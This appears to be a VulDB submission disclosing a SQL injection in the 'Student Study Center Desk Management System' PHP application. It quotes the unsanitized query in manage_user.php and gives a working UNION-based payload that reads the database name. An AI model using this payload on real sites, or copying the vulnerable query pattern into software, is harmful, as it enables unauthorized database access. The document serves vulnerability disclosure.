| Title | Student Study Center Desk Management System exist Sql injection Vulnerability . |
|---|
| Description | Vulnerability file location:/admin/user/manage_ user.php
look at this source code
```
$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
```
There is no detection and filtering of $id, and malicious data can be constructed here to attack the website database.
The construction statement is as follows
```
? page=user/manage_ user&id=0' union select 1,database(),3,4,5,6,7,8,9,10,11--+
```
https://s1.ax1x.com/2023/03/15/pp1gd8x.png
Source link
https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code |
|---|
| User | qidian (UID 30810) |
|---|
| Submission | 03/15/2023 05:53 (3 years ago) |
|---|
| Moderation | 03/15/2023 07:31 (2 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223111 [SourceCodester Student Study Center Desk Management System 1.0 manage_user.php ID sql injection] |
|---|
| Points | 20 |
|---|